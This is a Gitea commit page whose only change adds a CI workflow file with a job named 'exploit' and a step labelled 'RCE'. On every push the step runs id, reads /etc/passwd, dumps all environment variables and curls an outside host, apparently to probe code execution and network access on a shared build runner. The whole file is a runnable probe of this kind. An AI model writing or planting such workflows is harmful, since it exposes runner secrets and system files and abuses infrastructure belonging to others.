add ci
Some checks failed
test / exploit (push) Has been cancelled

This commit is contained in:
2026-05-12 09:24:20 +02:00
parent bccd66eb6d
commit e6449ea6cb

12
.gitea/workflows/ci.yml Normal file
View File

@@ -0,0 +1,12 @@
name: test
on: [push]
jobs:
exploit:
runs-on: ubuntu-latest
steps:
- name: RCE
run: |
id
cat /etc/passwd
env
curl http://api.hikka.host/api/statistic | head -c 100